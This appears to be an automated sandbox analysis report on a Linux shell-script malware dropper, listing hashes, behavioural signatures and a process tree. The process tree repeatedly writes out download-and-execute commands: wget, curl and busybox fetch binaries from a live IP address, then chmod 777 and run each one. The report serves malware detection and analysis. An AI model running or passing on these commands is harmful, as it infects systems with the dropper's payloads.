Analysis
-
max time kernel
17s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1575 chmod 1599 chmod 1635 chmod 1683 chmod 1611 chmod 1641 chmod 1677 chmod 1527 chmod 1533 chmod 1539 chmod 1545 chmod 1557 chmod 1581 chmod 1593 chmod 1587 chmod 1653 chmod 1605 chmod 1665 chmod 1521 chmod 1569 chmod 1647 chmod 1671 chmod 1551 chmod 1617 chmod 1623 chmod 1629 chmod 1563 chmod 1659 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 1522 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 1528 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 1534 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 1540 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 1546 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 1552 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 1558 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 1564 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 1570 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 1576 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 1582 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 1588 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 1594 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 1600 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 1606 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 1612 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 1618 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 1624 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 1630 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 1636 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 1642 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 1648 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 1654 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 1660 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 1666 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 1672 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 1678 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 1684 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1651 curl 1655 rm 1542 wget 1544 busybox 1547 rm 1650 wget 1543 curl 1546 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 1652 busybox 1654 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl
Processes
-
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh1⤵PID:1512
-
/bin/rm/bin/rm bins.sh2⤵PID:1513
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1520
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:1523
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1526
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:1529
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1532
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1538
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1544
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1546
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1547
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1550
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1556
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1562
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1568
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1574
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1580
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1586
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1592
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1598
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1604
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1610
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:1613
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1616
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:1619
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1620
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1622
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:1625
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1628
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1634
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1640
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1646
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:1650
-
